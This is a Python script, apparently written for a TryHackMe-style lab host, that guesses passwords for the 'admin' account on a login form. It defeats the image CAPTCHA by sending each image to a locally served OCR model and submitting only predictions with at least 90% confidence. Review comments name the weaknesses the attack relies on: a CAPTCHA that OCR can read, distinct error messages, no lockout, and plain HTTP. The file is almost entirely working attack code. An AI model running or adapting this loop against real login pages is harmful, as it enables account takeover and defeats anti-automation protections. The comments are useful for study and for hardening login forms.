#!/usr/bin/env python3
# Password-guessing loop against a login form protected by an image CAPTCHA.
# Per attempt: fetch the login page, pull the CAPTCHA image out of the HTML,
# ask a locally served OCR model to read it, and submit the form only when the
# model reports at least 90% confidence.
#
# NOTE(review): the loop depends on three properties of the target, each of
# which is a point where the login form can be hardened: the CAPTCHA is
# readable by an OCR model, the form answers with different messages for a
# wrong CAPTCHA and for wrong credentials, and (presumably, since the script
# has no handling for it) repeated failures are neither throttled nor locked
# out.
import requests
import base64
import json
from bs4 import BeautifulSoup

username = 'admin'
passwords = []

# Endpoints: the login form under test and the local OCR model server.
# NOTE(review): website_url is plain HTTP, so the credentials posted below
# travel unencrypted.
website_url = 'http://hqadmin.thm:8000'
model_url = 'http://localhost:8501/v1/models/ocr:predict'

# Read the candidate list, one entry per line, dropping the newline characters.
with open('passwords.txt', 'r') as wordlist:
    for entry in wordlist.readlines():
        passwords.append(entry.replace('\n', ''))

access_granted = False
count = 0

# Stop on the first accepted login or when the candidate list is exhausted.
while not access_granted and count < len(passwords):
    # `count` only advances after a definite credential rejection, so a
    # candidate is retried until its CAPTCHA was both predicted and accepted.
    password = passwords[count]

    # A fresh session per attempt; the session keeps the cookies set by the
    # GET and sends them with the POST.
    sess = requests.session()
    login_page = sess.get(website_url)

    # The CAPTCHA is the first <img> on the page. The payload is whatever
    # follows the first space in its src attribute -- presumably a data: URI
    # of the form "...;base64, <payload>"; confirm against the page.
    page = BeautifulSoup(login_page.content, 'html.parser')
    captcha_tag = page.find('img')
    encoded_image = captcha_tag['src'].split(' ')[1]

    # Request body for the OCR model's predict endpoint.
    model_data = {
        'signature_name': 'serving_default',
        'inputs': {'input': {'b64': encoded_image}},
    }

    # Ask the model for the CAPTCHA text and its confidence.
    model_reply = requests.post(model_url, json=model_data)
    outputs = model_reply.json()['outputs']
    probability = outputs['probability']
    answer = outputs['output']

    # Below 90% confidence nothing is submitted; the next iteration fetches
    # a new CAPTCHA for the same candidate.
    if probability < 0.90:
        print('[-] Prediction probability to low, not submitting CAPTCHA')
        continue

    # Form fields for the login POST.
    website_data = {
        'username': username,
        'password': password,
        'captcha': answer,
        'submit': 'Submit+Query',
    }

    login_reply = sess.post(website_url, data=website_data)
    response = login_reply.text

    # Wrong CAPTCHA: same candidate again on the next iteration.
    if 'Incorrect CAPTCHA value supplied' in response:
        print('[-] Incorrect CAPTCHA value was supplied. We will resubmit this password')
        continue

    # Wrong credentials: move on to the next candidate.
    if 'Incorrect Username or Password' in response:
        print('[-] Invalid credentials -- Username ' + username + ' Password: ' + password)
        count += 1
        continue

    # NOTE(review): success is inferred only from the absence of both messages
    # above; the HTTP status is never checked, so an error page or a changed
    # failure message would also be reported as a successful login.
    print('[+] Access Granted! -- Username: ' + username + ' Password: ' + password)
    access_granted = True